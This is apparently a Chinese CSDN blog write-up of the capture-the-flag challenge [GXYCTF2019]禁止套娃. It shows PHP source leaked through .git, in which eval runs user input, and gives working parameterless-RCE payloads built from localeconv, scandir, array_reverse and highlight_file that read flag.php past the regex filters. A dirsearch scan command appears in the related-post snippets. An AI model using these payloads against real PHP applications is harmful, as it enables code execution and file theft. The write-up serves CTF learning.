[GXYCTF2019]禁止套娃1

已于 2024-08-04 09:41:13 修改
阅读量98 收藏
点赞数 1
文章标签: vue.js
于 2024-08-03 22:11:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140897943
版权

打开题目

进行常规的检测漏洞,扫描目录发现存在.git文件夹下的文件存在

<?php

include "flag.php";

echo "flag在哪里呢?<br>";

if(isset($_GET['exp']))

{

    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))

    {             //不允许使用php协议

        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

        {                   //替换为空字符,匹配的形式是形如a();的无参数的表达式

            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))

            {

                // echo $_GET['exp'];

                @eval($_GET['exp']);

            }

            else

            {

                die("还差一点哦!");

            }

        }

        else

        {

            die("再好好想想!");

        }

    }

    else

    {

        die("还想读flag,臭弟弟!");

    }

}

// highlight_file(__FILE__);

  

?>
使用了正则表达式来过滤

[a-z,_]+匹配一个或多个字母、下划线或逗号

(匹配开括号

(?R)?匹配嵌套的正则表达式本身,?表示0或1次

)匹配闭括号

括号内无参数

下一阶段,咱们知道是要读取flag.php,所以我们要借助eval函数读取

var_dump(localeconv());
结果如下
array(18) 

["decimal_point"]=> string(1) "." 
["thousands_sep"]=> string(0) "" 
["int_curr_symbol"]=> string(0) "" 
["currency_symbol"]=> string(0) "" 
["mon_decimal_point"]=> string(0) "" 
["mon_thousands_sep"]=> string(0) "" 
["positive_sign"]=> string(0) "" 
["negative_sign"]=> string(0) "" 
["int_frac_digits"]=> int(127) 
["frac_digits"]=> int(127) 
["p_cs_precedes"]=> int(127) 
["p_sep_by_space"]=> int(127) 
["n_cs_precedes"]=> int(127) 
["n_sep_by_space"]=> int(127) 
"p_sign_posn"]=> int(127) 
["n_sign_posn"]=> int(127) 
["grouping"]=> array(0) { } 
["mon_grouping"]=> array(0) { } 
}
咱们想要的内容其实不在第一个但是在倒数第二个,所以咱们可以倒序输出第二个

?exp=var_dump(next(array_reverse(scandir(pos(localeconv())))));
结果如下:string(8) "flag.php"

之后使用highlight_file()显示文件的内容来得到flag

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
 

worker..
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3491
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
[GXYCTF2019]禁止套娃 1
qq_43618536的博客
07-04 392
BUUCTF的[GXYCTF2019]禁止套娃 1
[GXYCTF2019]禁止套娃1(无参RCE)
BoJing6的博客
03-29 369
这一题用githack获取源码我就不讲了,我想说的是这个题的方法和我自己的理解!这段代码就是禁止我们用一些php伪协议之类的东西if(';R)?这个就比较有意思了大概的意思就是把'a-z,_'之后的东西转义为NULL,通俗来说就是可以使用函数但是不能使用参数,下面是在shell中的测试结果解法一:函数介绍:scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1399
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
[GXYCTF2019]禁止套娃
weixin_45751765的博客
11-25 396
0x00 前言 写这篇主要巩固一下正则,难度不是特别大 递归正则属于是盲区了 0x01 Sunwear 看看页面空空如也,抓包看看也是空空如也 果断扫一下 Githack一把梭 拿到index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1742
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
[GXYCTF2019]禁止套娃1(两种方法)
m0_62879498的博客
05-02 4760
[GXYCTF2019]禁止套娃 1 进入环境,只有一串字符 查看源代码 抓包 什么都没有发现 尝试使用御剑进行目录爆破 也只是爆出了index.php 然后 尝试直接使用 php伪协议进行一个 flag 读取 但都失败了。在这种情况下,肯定是服务器进行了一个过滤。所以,我怀疑可能是源码泄露 。 尝试使用 GitHack 看看是不是源码泄露 GitHack 下载地址:https://github.com/lijiejie/GitHack 扒下了网站的源码 好了,现在就是代码审计了 最吸引眼球
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2495
BUUCTF记录贴
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 528
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
[GXYCTF2019]禁止套娃(特详解)
热门推荐
qq_74806534的博客
01-29 2万+
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。一个合法的表达式也可以是a(b();
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃奖品Java程序
08-12
1. **类与对象**:Java是面向对象的语言,程序可能会定义多个类,如`RussianDoll`,每个类代表一个套娃,包含其属性(如大小、颜色)和方法(如打开、放入小套娃)。 2. **递归数据结构**:为了模拟套娃的嵌套结构...
俄罗斯套娃奖品C++程序
05-19
1. **类与对象**:C++中的面向对象编程允许我们定义类来封装数据和操作数据的方法,创建对象来表示现实世界中的实体,比如每个“娃娃”都可以是一个对象,拥有自己的属性(如大小、颜色等)和行为(如打开、关闭等)...
俄罗斯套娃程序及设计
06-09
1. **递归函数遍历可达路径**:算法的核心是通过递归函数来探索所有可能的路径。递归函数会从当前位置出发,递归地尝试所有可行的下一步,直到到达目标或者无路可走。 2. **记录路径和当前重量**:在递归调用中,...
别致的俄罗斯套娃广场.ppt
03-13
1. **多媒体应用**:PPT(PowerPoint)是一种常见的多媒体演示工具,用于制作包含文字、图片、音频(如“音乐:陈楚生 - 天长地久”)等多种媒体元素的演示文稿,这涉及到多媒体内容的整合与设计。 2. **数字内容...
使用 Vue.js 构建大屏可视化系统
qq_42072014的博客
08-04 628
通过上述步骤,你已经具备了构建一个完整的 Vue.js 大屏可视化系统的知识。根据具体需求,你还可以添加更多高级功能,如动态加载图表数据、实时数据流等。
【Vue3】组件通信之provide&inject
又言又语
08-04 545
本文介绍 Vue3 中如何使用provide和inject实现父组件向子组件的子组件传数据,即向其孙子组件传数据。父组件向子组件传数据,实现方案有:propsv-model$ref默认插槽 / 具名插槽子组件向父组件传数据propsv-model$parent自定义事件作用域插槽父组件向子组件的子组件传数据,即向孙子组件传数据$attrsproviderinject任意组件间传数据mittPinia使用provide和inject实现跨组件传数据与$attrs。
Vue的学习(二)
最新发布
weixin_65450681的博客
08-04 758
数据发生变化会影响到视图 而v-bind绑定的数据视图变化 而数据不受影响 这就是单向的数据v-model 双向数据绑定 数据改变则视图发生变化 视图改变 则数据响应发生变化代码展示。
Vue.js 循环语句
wjs2024的博客
08-04 153
Vue.js 是一种流行的前端JavaScript框架,用于构建用户界面和单页应用程序。在Vue.js中,循环语句用于重复渲染元素或组件,这通常与数组或对象数据结合使用。本文将详细介绍Vue.js中的循环语句,包括基本用法、高级特性以及最佳实践。
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,你可以定义一个结构体来表示一个套娃人偶,其中包含一个指向更小人偶的指针。例如: ```c struct Doll { int size; struct Doll* smaller_doll; }; ``` 然后,你可以创建一组套娃人偶对象,并将它们连接起来形成套娃的层次结构。例如: ```c struct Doll doll1 = { 1, NULL }; struct Doll doll2 = { 2, &doll1 }; struct Doll doll3 = { 3, &doll2 }; // 依此类推... ``` 在这个例子中,doll3 是最外层的人偶,它包含了指向 doll2 的指针,而 doll2 又包含了指向 doll1 的指针。 最后,你可以通过遍历套娃的层次结构来打印出每个人偶的大小。例如: ```c struct Doll* current_doll = &doll3; while (current_doll != NULL) { printf("Doll size: %d\n", current_doll->size); current_doll = current_doll->smaller_doll; } ``` 这样,你就可以按照从外到内的顺序打印出每个人偶的大小。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值